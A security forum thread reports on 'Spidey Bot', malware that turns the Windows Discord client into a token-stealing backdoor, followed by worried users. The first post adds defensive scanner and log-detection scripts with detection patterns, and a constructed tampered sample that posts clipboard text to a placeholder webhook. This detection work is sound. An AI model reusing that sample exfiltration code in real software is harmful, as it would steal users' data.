DDE_Server

Level 21
Verified
Discord

A new malware is targeting Discord users by modifying the Windows Discord client so that it is transformed into a backdoor and an information-stealing Trojan.
The Windows Discord client is an Electron application, which means that almost all of its functionality is derived from HTML, CSS, and JavaScript. This allows malware to modify its core files so that the client executes malicious behavior on startup.
Discovered by researcher MalwareHunterTeam earlier this month, this malware is called "Spidey Bot" and when installed will add its own malicious JavaScript to the %AppData%\Discord\[version]\modules\discord_modules\index.js and %AppData%\Discord\[version]\modules\discord_desktop_core\index.js files.

Modified Discord index.js file
The malware will then terminate and restart the Discord app in order for the new JavaScript changes to be executed.
Once started, the JavaScript will execute various Discord API commands and JavaScript functions to collect a variety of information about the user that is then sent via a Discord webhook to the attacker.
Executing commands
The information that is collected and sent to the attacker includes:
  • Discord user token
  • Victim timezone
  • Screen resolution
  • Victim's local IP address
  • Victim's public IP address via WebRTC
  • User information such as username, email address, phone number, and more
  • Whether they have stored payment information
  • Zoom factor
  • Browser user agent
  • Discord version
  • The first 50 characters of the victim's Windows clipboard
The contents of the clipboard are especially concerning, as they could allow the user to steal passwords, personal information, or other sensitive data that was copied by the user.

After sending the information, the Discord malware will execute the fightdio() function, which acts as a backdoor.
This function will connect to a remote site to receive an extra command to execute. This allows the attacker to perform other malicious activity such as stealing payment information if it exists, executing commands on the computer, or potentially installing further malware.
The backdoor component
Researcher and reverse engineer Vitali Kremez, who also analyzed the malware, told BleepingComputer that the infection has been seen using file names such as "Blueface Reward Claimer.exe" and "Synapse X.exe". While it is not 100% certain how it is being spread, Kremez feels that the attacker is using Discord messaging to spread the malware.

As this infection shows no outward indication that the client has been compromised, a user will have no idea they are infected unless they perform network sniffing and see the unusual API and webhook calls.

If the installer is detected and removed, the modified Discord files will still remain infected and continue to be executed each time you start the client. The only way to clean the infection will be to uninstall the Discord app and reinstall it so that the modified files are removed.

Even worse, after over two weeks, this Discord malware still only has 24/65 detections on VirusTotal.
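A host-side check for the tampering the article describes, as an added example (not code from the article, from Discord, or from the malware): it enumerates the index.js entry points under %AppData%\Discord\[version]\modules\ and scores each file against a small set of heuristic indicators. The indicator list and weights are assumptions derived from the behaviour described above (webhook exfiltration, clipboard reads, WebRTC IP discovery, remote fetches), not a published signature for Spidey Bot; the two sample files are constructed for illustration.

```python
"""Heuristic scan of Discord's Electron module entry points for injected code.

Added example. INDICATORS/WEIGHTS are assumptions: patterns a stock module
loader has no reason to contain but an injected stealer/backdoor would need.
"""
import glob
import os
import re
from pathlib import Path
from typing import Optional

INDICATORS = {
    # Webhook execution URL, the exfiltration channel named in the article.
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/(?:v\d+/)?webhooks/\d+/[\w-]+", re.I),
    # Electron clipboard read (first 50 clipboard characters are stolen).
    "clipboard_read": re.compile(r"clipboard\.readText\s*\(", re.I),
    # WebRTC objects used to learn the public IP.
    "webrtc_ip_leak": re.compile(r"RTCPeerConnection|onicecandidate", re.I),
    # Generic remote fetch / backdoor command retrieval.
    "remote_fetch": re.compile(r"\b(?:fetch|https?\.(?:get|request)|XMLHttpRequest)\b", re.I),
    # Dynamic code execution of fetched commands.
    "eval_sink": re.compile(r"\b(?:eval|new Function)\s*\(", re.I),
    # Token handling; weak on its own, so weighted low.
    "token_access": re.compile(r"\btoken\b", re.I),
}
WEIGHTS = {"discord_webhook": 5, "clipboard_read": 3, "webrtc_ip_leak": 3,
           "eval_sink": 2, "remote_fetch": 1, "token_access": 1}
SUSPICIOUS_SCORE = 5  # assumed threshold: a single webhook URL is enough


def scan_source(text: str) -> dict:
    """Count indicator hits in one file's text and return a weighted score."""
    hits = {name: len(rx.findall(text)) for name, rx in INDICATORS.items()}
    hits = {k: v for k, v in hits.items() if v}
    score = sum(WEIGHTS[k] * min(v, 3) for k, v in hits.items())  # cap per indicator
    return {"hits": hits, "score": score, "suspicious": score >= SUSPICIOUS_SCORE}


def module_entry_points(appdata: Optional[str] = None) -> list:
    """index.js files under %AppData%\\Discord\\<version>\\modules\\*\\ (the
    article names discord_modules and discord_desktop_core)."""
    base = Path(appdata or os.environ.get("APPDATA", ""))
    pattern = str(base / "Discord" / "*" / "modules" / "*" / "index.js")
    return [Path(p) for p in sorted(glob.glob(pattern))]


def scan_files(paths) -> list:
    results = []
    for p in paths:
        try:
            text = Path(p).read_text(encoding="utf-8", errors="replace")
        except OSError as exc:
            results.append({"path": str(p), "error": str(exc)})
            continue
        r = scan_source(text)
        r.update(path=str(p), size=len(text))
        results.append(r)
    return results


# Constructed samples (not real Discord or malware code), for a dry run.
CLEAN_SAMPLE = "module.exports = require('./core.asar');\n"
TAMPERED_SAMPLE = """module.exports = require('./core.asar');
const { clipboard } = require('electron');
const hook = 'https://discordapp.com/api/webhooks/000000000000000000/AAAA-BBBB';
const pc = new RTCPeerConnection({iceServers: [{urls: 'stun:stun.example.org'}]});
pc.onicecandidate = e => {};
fetch(hook, {method: 'POST', body: JSON.stringify({clip: clipboard.readText().slice(0, 50)})});
"""

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("tampered", TAMPERED_SAMPLE)):
        print(label, scan_source(sample))
    for r in scan_files(module_entry_points()):
        flag = "SUSPICIOUS" if r.get("suspicious") else "ok"
        print(f"{flag:10} {r.get('path')} size={r.get('size')} hits={r.get('hits')}")
```

A clean hit list is not proof of a clean install: the check is a heuristic, and the article's own remediation (uninstall and reinstall so the module files are replaced) is the safe path regardless. Treat any file whose size has grown well beyond a one-line loader, or whose modification time postdates the Discord update that created it, as worth a manual look even if it scores low.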

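The article notes that the only visible sign is the client's unusual API and webhook traffic. As an added example (not from the article), the following detection logic runs over constructed egress-log lines and raises two kinds of alert for the Discord client process: execution of a Discord webhook (POST to /api/webhooks/<id>/<token>, the exfiltration channel described above) and any connection to a host outside an assumed allowlist of Discord domains (the backdoor's fetch of commands from a remote site). The log format, the process name and the allowlist are assumptions.

```python
"""Network-side detection of the two behaviours the article describes.

Added example. The log line format "<ts> <process> <method> <url>" and the
DISCORD_HOSTS allowlist are assumptions, not something the article specifies.
"""
import re
from urllib.parse import urlsplit

# Constructed sample log (invented format and values).
SAMPLE_LOG = """\
2019-10-21T09:00:01Z Discord.exe GET https://discordapp.com/api/v6/users/@me
2019-10-21T09:00:02Z Discord.exe GET https://cdn.discordapp.com/avatars/1/2.png
2019-10-21T09:00:03Z Discord.exe POST https://discordapp.com/api/webhooks/000000000000000000/AAAA-BBBB
2019-10-21T09:00:04Z Discord.exe GET http://203.0.113.10/cmd.txt
2019-10-21T09:00:05Z chrome.exe GET https://example.com/
2019-10-21T09:00:06Z Discord.exe GET https://gateway.discord.gg/?v=6
"""

LINE_RX = re.compile(r"^(\S+) (\S+) (GET|POST|PUT|PATCH|DELETE) (\S+)$")
# Webhook execution path: the user client has no normal reason to POST here.
WEBHOOK_RX = re.compile(r"^/api/(?:v\d+/)?webhooks/\d+/[\w-]+$")
# Assumed allowlist of hosts the stock client talks to; tune for your version.
DISCORD_HOSTS = ("discordapp.com", "discord.com", "discord.gg",
                 "discordapp.net", "discord.media")


def is_discord_host(host: str) -> bool:
    """Exact or subdomain match only, so 'discord.gg.attacker.example' fails."""
    return any(host == h or host.endswith("." + h) for h in DISCORD_HOSTS)


def parse_line(line: str):
    m = LINE_RX.match(line.strip())
    if not m:
        return None
    ts, proc, method, url = m.groups()
    u = urlsplit(url)
    return {"ts": ts, "process": proc, "method": method,
            "host": (u.hostname or "").lower(), "path": u.path}


def detect(log_text: str, client_process: str = "Discord.exe") -> list:
    """Return alerts for the client process: webhook exfil or off-allowlist egress."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["process"].lower() != client_process.lower():
            continue
        if ev["method"] == "POST" and is_discord_host(ev["host"]) and WEBHOOK_RX.match(ev["path"]):
            alerts.append({"rule": "webhook_exec", **ev})
        elif not is_discord_host(ev["host"]):
            alerts.append({"rule": "off_allowlist_egress", **ev})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['ts']} {a['rule']:22} {a['process']} {a['method']} {a['host']}{a['path']}")
```

The webhook rule is the higher-confidence one: a webhook URL embeds its own secret token, so a single POST from the client process to such a URL is enough to exfiltrate the collected data and is not something the normal client does. The allowlist rule needs tuning per client version (the client also reaches CDN and telemetry hosts), so review its alerts before acting on them.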
DDE_Server

Level 21
Verified
I am very sad, I am using it. I will uninstall it. Does anybody have information on how to make sure whether I am infected or not?
I noticed it restarted by itself, without me opening it, for an update, but I am suspicious, as it is explained in the article that the infection occurs after the application relaunches :cry: :cry:
I will use Revo Uninstaller to completely remove it with the advanced options, but what about the infections?

I will install it again, as the article said, to reset the modified entries :cry: :cry:

upnorth

Moderator
Verified
Staff member
Malware Hunter
Here's another Electron-based software. Maybe people will start paying attention, but nah, doubtful.


RoboMan

Level 30
Verified
Content Creator
Malware Tester
I am very sad, I am using it. I will uninstall it. Does anybody have information on how to make sure whether I am infected or not?
I noticed it restarted by itself, without me opening it, for an update, but I am suspicious, as it is explained in the article that the infection occurs after the application relaunches :cry: :cry:
I will use Revo Uninstaller to completely remove it with the advanced options, but what about the infections?

I will install it again, as the article said, to reset the modified entries :cry: :cry:
It's important to know Discord hasn't been hacked. If you catch the malware, it will use the Discord app as a means. Having Discord installed doesn't necessarily make you infected. You should have become infected with this malware previously, whose spreading methods are yet unknown (probably via Discord messages).

DDE_Server

Level 21
Verified
It's important to know Discord hasn't been hacked. If you catch the malware, it will use the Discord app as a means. Having Discord installed doesn't necessarily make you infected. You should have become infected with this malware previously, whose spreading methods are yet unknown (probably via Discord messages).
I will see which engine detected it and use its free scanner.

CyberTech

Level 32
Verified
I am very sad, I am using it. I will uninstall it. Does anybody have information on how to make sure whether I am infected or not?
I noticed it restarted by itself, without me opening it, for an update, but I am suspicious, as it is explained in the article that the infection occurs after the application relaunches :cry: :cry:
I will use Revo Uninstaller to completely remove it with the advanced options, but what about the infections?

I will install it again, as the article said, to reset the modified entries :cry: :cry:
I noticed it restarted by itself, without me opening it, for an update
Same here, I thought it was my Windows 10 (1903) due to bugs or something until I read this ;/